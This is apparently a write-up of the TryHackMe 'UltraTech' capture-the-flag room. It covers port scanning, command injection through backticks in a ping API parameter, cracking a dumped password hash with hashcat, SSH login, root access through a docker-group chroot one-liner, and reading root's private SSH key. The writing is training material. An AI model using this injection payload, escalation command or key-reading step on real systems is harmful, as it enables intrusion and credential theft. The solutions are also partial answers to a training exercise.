This is a write-up of the room UltraTech from TryHackMe.
Task 1: Deploy the machine
Deploy the machine by clicking deploy.
Task 2: Enumeration
Let’s scan the box by running
┌─[[email protected]]─[~/thm/ultratech] └──╼ #nmap -sC -sV -p- $IP Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 20:05 BST PORT STATE SERVICE VERSION 8081/tcp open http Node.js Express framework |_http-cors: HEAD GET POST PUT DELETE PATCH | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Site doesn't have a title (text/html; charset=utf-8). 31331/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 15C1B7515662078EF4B5C724E2927A96 | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: UltraTech - The best of technology (AI, FinTech, Big Data) ...
As you can see from the output,
Node.js is running on port 8081.
The other port in use is
31331 where there is an apache server.
If we visit the page it shows:
When we use Burpesuite, we can see that is uses 2 routes:
http://10.10.27.184:8081/auth?login=user&password=password from the /partners.html page.
Task 3: Let the fun begin!
Let’s investigate the
If we try
http://10.10.27.184:8081/ping?ip=ls, we get
ping: ls: Temporary failure in name resolution.
But if we try
http://10.10.27.184:8081/ping?ip=`ls`, we get
ping: utech.db.sqlite: Name or service not known
To see the contents of the database, we can visit
We get the hash
If we run hashcat against the hash, it will reveal the password:
┌─[[email protected]]─[~/thm/ultratech] └──╼ #hashcat hash /usr/share/wordlists/rockyou.txt ... f357a0***************:n*******
We can now SSH into the room with user r00t.
Task 4: The Root of All Evil
We can now run
linenum.sh to find ways of becoming root.
You can see from the output that we are part of the docker group, so we can run a command to try and escalate.
We can run
docker run -v /:/mnt --rm -it bash chroot /mnt sh, this will give us the root user.
We can then run
cat /root/.ssh/id_rsa to ge the first 9 letters which gives us
That’s the room complete!